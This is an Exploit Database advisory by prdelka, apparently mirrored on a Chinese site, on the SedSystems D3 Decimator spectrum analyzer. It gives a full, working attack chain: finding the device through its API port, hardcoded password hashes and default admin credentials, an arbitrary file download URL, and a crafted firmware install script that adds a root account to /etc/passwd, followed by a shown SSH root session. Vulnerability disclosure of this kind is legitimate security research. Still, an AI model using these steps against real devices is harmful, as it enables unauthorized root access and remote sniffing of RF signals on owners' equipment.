SedSystems D3 Decimator – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： prdelka
  日期： 2016-01-11
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/41877/

• SedSystems D3 Decimator Multiple Vulnerabilities
  ================================================
  Identification of the vulnerable device can be performed by scanning for 
  TCP port 9784 which offers a default remote API. When connected to this 
  device it will announce itself with "connected" or similar:
  
  Connected to x.x.x.x.
  Escape character is '^]'.
  connected
  status
  status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
  ping
  ping:ok
  
  The web service by default has a user interface for accessing the RF 
  spectrum analyzer capability. The device itself from the API can give 
  raw remote access to I/Q samples so can be used to remotely sniff the 
  RF spectrum. The Web Configuration Manager can be found on 
  "/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.
  
  Hardcoded credentials can be found in the /etc/passwd files contained 
  within the default firmware since at least February 2013. The following 
  entries can be found:
  
  root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
  admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly
  
  The admin user has a default password of "admin", at this time the root 
  user password is unknown however there is no documented way of changing 
  this trivially in a device. Using the "admin" user you can obtain a web 
  session to the wcm.cgi and exploit a hidden arbitary file download 
  vulnerability discovered by reverse engineering the firmware:
  
  http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd
  
  This will allow you to download any file and as the "admin" user has root
  privileges you can obtain access to any file on the device. To execute 
  arbitary code you can make use of a vulnerbaility within the firmware 
  flash routines. By uploading a crafted tarball that contains a "install" 
  script in its root, the device will accept your firmware and then attempt
  to execute ./install if found as root, you can then cancel the "flash" 
  process to prevent bricking/modifcation of the device. The problem is due
  to /usr/bin/install_flash which after using "tar" to unpack an archive 
  to a tmp folder of /tmp/PID_of_tar does the following:
  
  80# If the archive contained its own install script then use that
  81
  82if [ -x ./install ]; then
  83./install $all_args
  84rc=$?
  85exit $rc
  86fi
  87
  
  Using this vulnerability you can upload a .tar file containing an install
  file that looks like the following to obtain a root user account with 
  adm1n/admin.
  
  cat install 
  #!/bin/sh
  echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd
  
  You can then SSH remotely to the device as PermitRootLogin is enabled 
  by default.
  
  E.g.
  
  $ ssh-l adm1n x.x.x.x
  adm1n@x.x.x.x's password: admin 
  # uname -a
  Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
  # cat /proc/cpuinfo
  Processor	: ARM926EJ-S rev 4 (v5l)
  BogoMIPS	: 103.83
  Features	: swp half thumb fastmult vfp edsp java 
  CPU implementer	: 0x41
  CPU architecture: 5TEJ
  CPU variant	: 0x0
  CPU part	: 0x926
  CPU revision	: 4
  
  Hardware	: SED 32XX Based CCA
  Revision	: 0000
  Serial		: 0000000000000000
  # 
  
  Vendor website can be found at the following url:
  * http://www.sedsystems.ca/decimator_spectrum_analyzer
  
   -- prdelka